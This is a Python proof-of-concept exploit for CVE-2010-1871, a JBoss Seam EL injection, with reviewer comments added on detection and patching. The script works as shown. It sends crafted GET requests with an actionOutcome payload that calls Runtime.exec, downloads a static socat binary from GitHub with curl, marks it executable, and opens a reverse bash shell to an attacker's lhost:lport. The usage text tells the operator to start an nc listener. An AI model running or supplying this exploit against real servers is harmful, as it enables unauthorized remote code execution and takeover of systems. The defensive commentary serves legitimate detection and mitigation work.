# Exploit Title: JBoss Seam Vulnerability - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/3/html/installation_guide/downloading_and_extracting_the_zip_file1
# Version: JBoss Web 2.2.1CR2 - JBoss Web/3.0.0-CR2
# CVE : CVE-2010-1871
#
# NOTE(review): public proof-of-concept for CVE-2010-1871 (JBoss Seam EL
# injection via the `actionOutcome` request parameter). Read as a defender,
# the observable behaviour of this file is three plain HTTP GET requests to
# one `.seam` URL whose query string carries `actionOutcome=` followed by a
# URL-encoded EL expression (`%23{` == `#{`); the staged commands fetch a
# static socat binary into /tmp, make it executable and start a reverse
# shell to lhost:lport. Web-server access logs and a WAF rule matching
# `actionOutcome=` together with `%23{` / `#{` are the cheapest detection
# points; the fix is the vendor patch for CVE-2010-1871, plus egress
# filtering from the application server, which breaks both the download and
# the callback stages shown below.

from requests import Request, Session
import sys
import json  # NOTE(review): imported but never used in this file.


def title():
    """Print the ASCII banner, a note about the socat download, and author links."""
    print(''' _______ ________ ___ ___ __ ___ __ ___ ______ __ / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ |/ _ \____ /_ | | | \ \ / /| |__ ______ ) | | | || | | | |______| | (_) | / / | | | | \ \/ / | __|______/ /| | | || | | | |______| |> _ < / / | | | |____ \ / | |____ / /_| |_| || | |_| | | | (_) |/ / | | \_____| \/ |______| |____|\___/ |_|\___/ |_|\___//_/ |_| Note: Socat is downloaded to establish the reverse connection from the https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat site. Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''')


def exploit(url, lhost, lport):
    """Send one GET per staged command, each embedded in the Seam EL payload.

    Args:
        url: target `.seam` page URL (the usage text shows a login.seam example).
        lhost: address the third command's socat process connects back to.
        lport: port on lhost for that connection (passed as a string).

    Returns:
        None. Each request's HTTP status code is printed by `request()`; the
        commands' own output is not captured.

    Detection note: all three requests share the same prefix (`?cid=21&actionOutcome=`
    followed by `%23{`), so a single log/WAF pattern covers the whole chain.
    """
    # Three '+'-separated (i.e. URL-encoded space) shell commands: download a
    # static socat binary to /tmp, make it executable, run it as a reverse shell.
    commands = ['curl+-o+/tmp/tmp/socat+https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat','chmod+777+/tmp/tmp/socat','/tmp/tmp/socat+TCP4%3a'+lhost+'%3a'+lport+'+EXEC%3a/bin/bash']
    # URL-encoded Seam EL expression opened with `%23{` (`#{`); it is left
    # unterminated here and closed per request in the loop below.
    payload = '?cid=21&actionOutcome=/pwn.xhtml?user%3d%23{expressions.getClass().forName("java.io.BufferedReader").getDeclaredMethod("readLine").invoke("".getClass().forName("java.io.BufferedReader").getConstructor("".getClass().forName("java.io.Reader")).newInstance("".getClass().forName("java.io.InputStreamReader").getConstructor("".getClass().forName("java.io.InputStream")).newInstance("".getClass().forName("java.lang.Process").getDeclaredMethod("getInputStream").invoke("".getClass().forName("java.lang.Runtime").getDeclaredMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getDeclaredMethod("getRuntime").invoke(null),"'
    for command in commands:
        # Append the command and the closing quotes/parentheses/braces of the EL
        # expression, then fire the request; no response content is inspected.
        url_command = url+payload+command+'")))))}}'
        request(url_command)


def request(url):
    """Issue a single GET to `url` and print the HTTP status code.

    Uses a browser-like User-Agent, a 15-second timeout and `verify=False`
    (TLS certificate validation disabled; requests will warn about this).
    Any connection error or timeout propagates as a requests exception.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
    }
    s = Session()
    req = Request('GET', url,headers=headers)
    prepped = req.prepare()
    resp = s.send(prepped, verify=False, timeout=15 )
    print(resp.status_code)


if __name__ == '__main__':
    title()
    # Expects exactly: <target .seam URL> <lhost> <lport>; anything shorter
    # prints usage and exits (status 0 via the site-provided `exit`).
    if(len(sys.argv) < 4):
        print('[+] USAGE: python3 %s https:// lhost lport\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10/app/common/mainPages/login.seam 192.168.0.11 4444\n'%(sys.argv[0]))
        print('[+] Do not forget to run the listener: nc -lvp 4444\n')
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2],sys.argv[3])